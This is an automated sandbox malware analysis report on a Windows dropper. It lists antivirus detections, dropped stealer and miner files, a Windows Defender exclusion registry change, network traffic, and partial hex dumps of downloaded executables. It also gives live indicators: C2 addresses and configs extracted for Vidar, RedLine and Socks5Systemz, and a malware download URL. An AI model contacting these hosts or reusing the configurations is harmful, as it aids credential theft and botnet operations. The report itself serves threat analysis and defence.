https://vk.com/doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08GcZph4ge7Tw9b9Uj3c1wFnC01nFynmnNL&api=1&no_preview=1#ww11	false		high
https://monoblocked.com/525403/setup.exe	false	Avira URL Cloud: malware	unknown
https://db-ip.com/demo/home.php?s=149.18.24.96	false		high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: WlCIinu0yp.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://193.233.132.139/	Avira URL Cloud: Label: phishing
Source: https://monoblocked.com/525403/setup.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1357328
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Avira: detection malicious, Label: TR/Miner.mdqej
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	Avira: detection malicious, Label: TR/Miner.mdqej
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Avira: detection malicious, Label: HEUR/AGEN.1306558
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Avira: detection malicious, Label: TR/Redcap.nszjr
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1357328
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\060[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1332570
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Avira: detection malicious, Label: HEUR/AGEN.1306558
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	Avira: detection malicious, Label: TR/Redcap.nszjr
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fiona[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306558

Found malware configuration

Source: 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "03cea2609023d13f145ac6c5dc897112", "Version": "9.3"}
Source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.raw.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["5.42.65.96:28380"], "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: softjenimmp3converter.exe.3992.49.memstrmin	Malware Configuration Extractor: Socks5Systemz {"C2 list": ["cskuxgp.net"]}

Multi AV Scanner detection for domain / URL

Source: monoblocked.com	Virustotal: Detection: 15%	Perma Link
Source: pofix.red	Virustotal: Detection: 16%	Perma Link
Source: triedchicken.net	Virustotal: Detection: 20%	Perma Link
Source: carthewasher.net	Virustotal: Detection: 15%	Perma Link
Source: iplis.ru	Virustotal: Detection: 10%	Perma Link
Source: http://193.233.132.139/	Virustotal: Detection: 20%	Perma Link
Source: https://monoblocked.com/	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	ReversingLabs: Detection: 36%
Source: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	ReversingLabs: Detection: 70%
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	ReversingLabs: Detection: 95%
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Default12_big[1].exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Space1.9_big[1].exe	ReversingLabs: Detection: 24%
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-1CATB.tmp	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libeay32.dll (copy)	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\heidiLgVUNbWj4Aw0\6JeTTVCBi2pYO9g7t24p.exe	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: WlCIinu0yp.exe	ReversingLabs: Detection: 57%
Source: WlCIinu0yp.exe	Virustotal: Detection: 66%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cad54ba5b01423b1af8ec10ab5719d97[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\setup[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\aeb24096[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fiona[1].exe	Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe

Unpacked PE file: 46.2.softjenimmp3converter.exe.400000.0.unpack

Source: unknown	HTTPS traffic detected: 172.67.75.163:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.111:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.181:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.119:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.121:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.55.189:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.182:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.125.202:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.0:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.104.85.160:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49935 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49938 version: TLS 1.2

Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000000.1909451075.000001C579D82000.00000002.00000001.01000000.00000007.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2953053052.000001C57C160000.00000002.00000001.00040000.00000007.sdmp
Source:	Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ source: is-280SC.tmp.25.dr
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2746107478.0000000068E44000.00000002.00000001.01000000.00000021.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004501000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547368675.00000000005A4000.00000040.00000001.01000000.00000006.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3127380532.00000000005EB000.00000040.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538173466.000000000059E000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb source: is-OFQC1.tmp.25.dr
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\kkelsch\Documents\PushNotifications\PushSharp\PushSharp-master\PushSharp.Core\obj\Debug\PushSharp.Core.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005DCA000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004C88000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\Microsoft Enterprise Library January 2006\src\Data\obj\Debug\Microsoft.Practices.EnterpriseLibrary.Data.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb source: is-280SC.tmp.25.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions			Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe			Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004DB1CB FindFirstFileExW,GetLastError,		7_2_004DB1CB
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,		7_2_0040B300

Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2049837 ET TROJAN Suspected PrivateLoader Activity (POST) 192.168.2.4:49730 -> 5.42.66.10:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: cskuxgp.net
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199680449169
Source: Malware configuration extractor	URLs: 5.42.65.96:28380

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: PaYqxdT7Epov9iGUzAxGNwu7.exe.0.dr
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: b4GIFfxokws3p_peAzAPeg9D.exe.0.dr

Performs DNS queries to domains with low reputation

Source:

DNS query: f.123654987.xyz

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.4:49806 -> 5.42.66.10:50505
Source: global traffic	TCP traffic: 192.168.2.4:49808 -> 95.217.245.42:9000
Source: global traffic	TCP traffic: 192.168.2.4:49809 -> 147.45.47.93:58709
Source: global traffic	TCP traffic: 192.168.2.4:49810 -> 5.42.65.96:28380
Source: global traffic	TCP traffic: 192.168.2.4:49832 -> 193.233.132.253:50500

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:20 GMTServer: Apache/2.4.52 (Ubuntu)Content-Description: File TransferContent-Disposition: attachment; filename=timeSync.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 218112Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 c3 78 b2 a1 a2 16 e1 a1 a2 16 e1 a1 a2 16 e1 bf f0 83 e1 b0 a2 16 e1 bf f0 95 e1 c4 a2 16 e1 bf f0 92 e1 8b a2 16 e1 86 64 6d e1 a4 a2 16 e1 a1 a2 17 e1 ce a2 16 e1 bf f0 9c e1 a0 a2 16 e1 bf f0 82 e1 a0 a2 16 e1 bf f0 87 e1 a0 a2 16 e1 52 69 63 68 a1 a2 16 e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 18 b3 7e 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 00 00 00 dc 6e 02 00 00 00 00 1f 18 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 6f 02 00 04 00 00 32 32 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 9f 02 00 3c 00 00 00 00 90 6e 02 f8 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c3 a7 00 00 00 10 00 00 00 a8 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 e8 01 00 00 c0 00 00 00 ea 01 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 d3 6b 02 00 b0 02 00 00 28 00 00 00 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 94 00 00 00 90 6e 02 00 96 00 00 00 be 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 01 May 2024 06:40:20 GMTContent-Type: application/octet-streamContent-Length: 3196416Last-Modified: Wed, 01 May 2024 03:58:33 GMTConnection: keep-aliveETag: "6631bde9-30c600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6a 99 1d e4 2e f8 73 b7 2e f8 73 b7 2e f8 73 b7 65 80 70 b6 25 f8 73 b7 65 80 76 b6 ee f8 73 b7 65 80 74 b6 2f f8 73 b7 ec 79 8e b7 2a f8 73 b7 ec 79 77 b6 3d f8 73 b7 ec 79 70 b6 34 f8 73 b7 ec 79 76 b6 75 f8 73 b7 65 80 77 b6 36 f8 73 b7 65 80 75 b6 2f f8 73 b7 65 80 72 b6 35 f8 73 b7 2e f8 72 b7 0e f9 73 b7 dd 7a 7a b6 32 f8 73 b7 dd 7a 8c b7 2f f8 73 b7 2e f8 e4 b7 2f f8 73 b7 dd 7a 71 b6 2f f8 73 b7 52 69 63 68 2e f8 73 b7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 5e ef 25 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 8c 15 00 00 0e 04 00 00 00 00 00 1c d4 b4 00 00 10 00 00 00 a0 15 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 b4 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 50 c0 92 00 83 0c 00 00 d4 cc 92 00 b0 03 00 00 00 c0 19 00 a0 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 c0 92 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 92 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 15 00 00 10 00 00 00 26 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 02 00 00 a0 15 00 00 02 01 00 00 2a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 20 18 00 00 08 00 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 b0 00 00 00 70 18 00 00 00 00 00 00 34 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 a0 00 00 00 20 19 00 00 60 00 00 00 34 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 b0 00 00 00 c0 19 00 00 b0 00 00 00 94 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 20 78 00 00 70 1a 00 00 28 03 00 00 44 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 60 22 00 00 90 92 00 00 5a 22 00 00 6c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=Retailer_prog.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 5809400Content-Type: application/octet-streamData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 e7 e6 0f 66 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 27 00 34 11 00 00 a8 08 00 00 00 00 00 94 13 cd 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 cf 00 00 02 00 00 73 a7 58 00 02 00 00 80 00 00 10 00 00 10 03 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 10 cd 00 4c 00 00 00 4c 10 cd 00 48 03 00 00 00 20 cd 00 e4 ad 02 00 00 00 00 00 00 00 00 00 00 8c 58 00 f8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f cd 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 11 cd 00 68 00 00 00 bc a0 a1 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 00 cd 00 00 10 00 00 00 cc 55 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 20 0f 00 00 00 10 cd 00 00 10 00 00 00 ce 55 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 e4 ad 02 00 00 20 cd 00 00 ae 02 00 00 de 55 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 